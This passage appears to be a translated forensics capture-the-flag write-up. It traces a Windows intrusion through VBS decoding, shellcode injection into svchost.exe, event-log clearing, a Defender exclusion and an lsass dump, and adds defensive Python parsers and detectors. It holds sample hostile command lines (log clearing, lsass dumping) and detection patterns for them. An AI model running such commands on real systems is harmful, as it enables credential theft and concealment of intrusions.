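    then every 7th one, for as long as the index stays below Length-1."""
    out = []
    i = start
    while i < len(s) - 1:
        out.append(s[i])
        i += step
    return "".join(out)


_LITERAL_RE = re.compile(r"WrapPresent\s+'([^']*)'")


def decode_literals(powershell_text):
    """Decode every WrapPresent '<literal>' call in the reassembled script."""
    return [wrap_present(lit) for lit in _LITERAL_RE.findall(powershell_text)]


if __name__ == "__main__":
    print(reassemble_a4(VBS_SAMPLE))
    print(wrap_present(FIRST_LITERAL))
```

Feed the whole present.vbs to reassemble_a4 instead of VBS_SAMPLE and decode_literals returns the plaintext of every decoder call; the first of those is the download URL that TASK 6 asks for, so the next-stage URL can be recovered statically rather than by running the script.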

TASK 6
What is the URL that the next stage was downloaded from?

Just monitor what the previous script does,
or drop it in a shell and run it.

TASK 7
What is the IP and port that the executable downloaded the shellcode from (IP:Port)?

Find an exe whose name you get from the decryption in the previous step, then find its dump among the files, reverse it and you will see the address.

Here inet_pton() converts an IP address in string form into a network address structure;
the 2 (AF_INET) means the stored address is an IPv4 address,
and paddrbuf.sa_data[2] is the pointer to the destination where it is stored.

The paddrbuf.sa_data below is the field that holds the address information; here it is actually the port number, and the following htons() converts that 16-bit value into big-endian network byte order.
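The sockaddr layout behind that decompiler output is easy to misread, so here is an added Python example (my own, not from the writeup) that builds a sockaddr_in the way inet_pton() and htons() fill it and then reads the IP and port back out of the sa_data bytes, which is what you do when the values come from a memory dump or a debugger instead of from source. The endpoint 198.51.100.23:4444 is a constructed documentation address, not a value from the investigation; all function names are my assumptions.

```python
import socket
import struct

AF_INET = 2  # the literal 2 passed to inet_pton() in the decompiled code


def build_sockaddr_in(ip, port):
    """Lay out a 16-byte sockaddr_in as the C struct is laid out on x86:
    sin_family (2 bytes, host/little-endian order) | sin_port (2 bytes,
    network order, i.e. what htons() returns) | sin_addr (4 bytes, what
    inet_pton() writes) | 8 bytes of zero padding."""
    family = struct.pack("<H", AF_INET)
    port_be = struct.pack("!H", port)            # htons(port)
    addr = socket.inet_pton(socket.AF_INET, ip)  # inet_pton(AF_INET, ip, &sin_addr)
    return family + port_be + addr + b"\x00" * 8


def sa_data_of(sockaddr):
    """sa_data is the generic 14-byte tail after sa_family, so sa_data[0:2]
    overlays sin_port and sa_data[2:6] overlays sin_addr.  That is why the
    decompiler shows inet_pton() writing to &paddrbuf.sa_data[2]."""
    return sockaddr[2:16]


def decode_sa_data(sa_data):
    """Recover "IP:Port" from raw sa_data bytes seen in a dump."""
    (port,) = struct.unpack("!H", sa_data[0:2])   # undo htons(): read big-endian
    ip = socket.inet_ntop(socket.AF_INET, sa_data[2:6])
    return f"{ip}:{port}"


def port_misread_as_little_endian(sa_data):
    """The common mistake: reading the two port bytes in host order."""
    return struct.unpack("<H", sa_data[0:2])[0]


# Constructed example endpoint (RFC 5737 documentation range).
SAMPLE = build_sockaddr_in("198.51.100.23", 4444)

if __name__ == "__main__":
    print(SAMPLE.hex())
    print(decode_sa_data(sa_data_of(SAMPLE)))
    print(port_misread_as_little_endian(sa_data_of(SAMPLE)))
```

The last line of the demo shows why the byte order matters: the same two bytes read as a host-order integer give a port that does not exist in the sample, so when pulling IP:Port out of a dump always read the port big-endian.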

TASK 8
What is the process ID of the remote process that the shellcode was injected into?

It creates a system process snapshot and then starts working from the top.
Here the while loop contains a comparison and below it there is an OpenProcess call, so I guess it is looking for a process to inject into.
The value being compared is the svchost.exe process; it matches from the start, so find the earliest one that also loaded ntdll.dll.
But there are actually two, so you need to check which one has an external connection.

Or the approach a friend suggested: windows.malfind.Malfind
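The selection logic described above (walk the process snapshot in order, take the svchost.exe instances that have ntdll.dll loaded, then use the network connections to tell them apart) can be scripted over volatility output. This Python is an added example of mine, not code from the writeup or from volatility: PROCS and CONNS are constructed rows in the shape of windows.pslist/windows.dlllist and windows.netscan output, the PIDs and addresses are made up, and the parent-process check (a legitimate svchost.exe is always started by services.exe) is an extra heuristic I added that the writeup does not use.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Proc:
    """One process as pslist/dlllist would report it (constructed)."""
    pid: int
    ppid: int
    name: str
    dlls: tuple = ()  # lowercase module names loaded by the process


@dataclass
class Conn:
    """One row of windows.netscan (constructed)."""
    pid: int
    foreign_addr: str
    foreign_port: int
    state: str


# Address space that is "internal" for this host: RFC 1918, loopback, link-local
# and the unspecified block.  Anything else counts as an external endpoint.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
)]


def is_external(addr):
    """True for routable endpoints; netscan prints '*' or '-' for unknown ones."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if ip.version == 6:
        return ip.is_global
    return not any(ip in net for net in INTERNAL_NETS)


def injection_candidates(procs, conns, target="svchost.exe", needs_dll="ntdll.dll"):
    """Reproduce the injector's own walk (matching name, required DLL loaded,
    snapshot order kept), then rank the matches by two defender-side signals:
    an external connection and a parent that is not services.exe."""
    by_pid = {p.pid: p for p in procs}
    external_pids = {c.pid for c in conns if is_external(c.foreign_addr)}
    result = []
    for p in procs:
        if p.name.lower() != target or needs_dll not in p.dlls:
            continue
        parent = by_pid.get(p.ppid)
        result.append({
            "pid": p.pid,
            "external_connection": p.pid in external_pids,
            "odd_parent": parent is None or parent.name.lower() != "services.exe",
        })
    # most suspicious first; the sort is stable, so ties keep snapshot order
    result.sort(key=lambda r: (r["external_connection"], r["odd_parent"]), reverse=True)
    return result


# Constructed snapshot: three svchost.exe instances, one of them started by
# explorer.exe and talking to an outside address.
PROCS = [
    Proc(4, 0, "System"),
    Proc(612, 4, "smss.exe", ("ntdll.dll",)),
    Proc(700, 612, "services.exe", ("ntdll.dll", "kernel32.dll")),
    Proc(812, 700, "svchost.exe", ("ntdll.dll", "kernel32.dll", "rpcrt4.dll")),
    Proc(904, 700, "svchost.exe", ("ntdll.dll", "kernel32.dll")),
    Proc(2260, 3120, "svchost.exe", ("ntdll.dll", "kernel32.dll", "ws2_32.dll")),
    Proc(3120, 2900, "explorer.exe", ("ntdll.dll",)),
]
CONNS = [
    Conn(812, "127.0.0.1", 135, "LISTENING"),
    Conn(904, "10.0.2.2", 53, "ESTABLISHED"),
    Conn(2260, "203.0.113.8", 443, "ESTABLISHED"),
]

if __name__ == "__main__":
    for row in injection_candidates(PROCS, CONNS):
        print(row)
```

With real data, build PROCS from `windows.pslist` plus `windows.dlllist` and CONNS from `windows.netscan`; a candidate that ranks first on both signals is also the one to confirm with `windows.malfind.Malfind`, which flags the injected region itself.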

TASK 9
After the attacker established a Command & Control connection, what command did they use to clear all event logs?

Go through the Windows PowerShell.evtx log.

TASK 10
What is the full path of the folder that was excluded from defender?

Look at the Defender Operational.evtx log.

TASK 11
What is the original name of the file that was ingressed to the victim?

This question is vague and does not say clearly which file it means, but from its wording there are two possibilities:
1. the file name was changed after it was on the victim's machine
2. it was changed before being transferred to the victim's machine

If you didn't go through every Windows PowerShell log entry back in TASK 9, you are basically stuck here; if you did, you should remember that one of the PowerShell entries loaded what looked like a user-written .exe with arguments.
But strangely it referenced lsass.exe and Microsoft's accept-EULA parameter; only one tool has the same parameters and usage.
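TASK 9, 10 and 11 all come down to reading the same two event logs for three patterns. The following Python is an added example of mine (not from the writeup) that runs those three checks over exported records: log-clearing commands in Windows PowerShell engine events, Defender event 5007 entries that add an Exclusions\Paths value, and a procdump-style lsass dump invoked through a binary with some other name. RECORDS is constructed; the message layouts follow the real events but every path, command and value is made up, and the regexes and function names are my assumptions.

```python
import re

# Constructed records standing in for rows exported from Windows PowerShell.evtx
# and Microsoft-Windows-Windows Defender%4Operational.evtx.  Formats follow the
# real events; every value is made up for this example.
RECORDS = [
    {"channel": "Windows PowerShell", "event_id": 400,
     "message": "Engine state is changed from None to Available.\n\tHostApplication=powershell.exe -ep bypass -enc JABmAGkAbABlAA=="},
    {"channel": "Windows PowerShell", "event_id": 400,
     "message": "Engine state is changed from None to Available.\n\tHostApplication=powershell.exe -c Clear-EventLog -LogName Application,System,Security"},
    {"channel": "Microsoft-Windows-Windows Defender/Operational", "event_id": 5007,
     "message": "Microsoft Defender Antivirus Configuration has changed.\n\tOld value: \n\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public\\stage = 0x0"},
    {"channel": "Windows PowerShell", "event_id": 400,
     "message": "Engine state is changed from None to Available.\n\tHostApplication=powershell.exe -c C:\\Users\\Public\\stage\\updater.exe -accepteula -ma lsass.exe C:\\Users\\Public\\stage\\out.dmp"},
    {"channel": "Windows PowerShell", "event_id": 400,
     "message": "Engine state is changed from None to Available.\n\tHostApplication=powershell.exe -c Get-Process"},
]

# Ways of wiping event logs that show up in command lines.
LOG_CLEAR_RE = re.compile(
    r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b|\bClear-EventLog\b|\bRemove-EventLog\b", re.I)
# Defender 5007: the new value names the registry key of the exclusion.
EXCLUSION_RE = re.compile(r"Exclusions\\Paths\\(.+?)\s*=\s*0x", re.I)


def host_application(message):
    """HostApplication= in engine events (400/403/600) carries the command line."""
    m = re.search(r"HostApplication=(.*)", message)
    return m.group(1).strip() if m else None


def lsass_dump_tool(cmdline):
    """Return the binary that was run with -accepteula against lsass, whatever it
    is called; the tool's name is not trusted because the EXE may be renamed."""
    toks = cmdline.split()
    low = [t.lower() for t in toks]
    if "-accepteula" not in low or not any("lsass" in t for t in low):
        return None
    idx = low.index("-accepteula")
    exes = [toks[i] for i in range(idx) if low[i].endswith(".exe")]
    return exes[-1] if exes else None


def triage(records):
    """Run the three checks over exported records and collect the hits."""
    findings = {"log_clearing": [], "defender_exclusions": [], "lsass_dumps": []}
    for r in records:
        msg = r["message"]
        if r["channel"] == "Windows PowerShell":
            cmd = host_application(msg)
            if not cmd:
                continue
            if LOG_CLEAR_RE.search(cmd):
                findings["log_clearing"].append(cmd)
            tool = lsass_dump_tool(cmd)
            if tool:
                findings["lsass_dumps"].append(tool)
        elif r["event_id"] == 5007:
            findings["defender_exclusions"].extend(EXCLUSION_RE.findall(msg))
    return findings


if __name__ == "__main__":
    for key, hits in triage(RECORDS).items():
        print(key, hits)
```

The lsass check deliberately keys on the arguments rather than the file name, which is exactly the situation in this task: a renamed binary still needs the same switches, and a Defender exclusion on the folder it was dropped into is the usual prelude, so the three findings read together as one chain.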

TASK 12
What is the name of the process targeted by procdump.exe?

What do you think~

http://www.chinasem.cn/article/760452
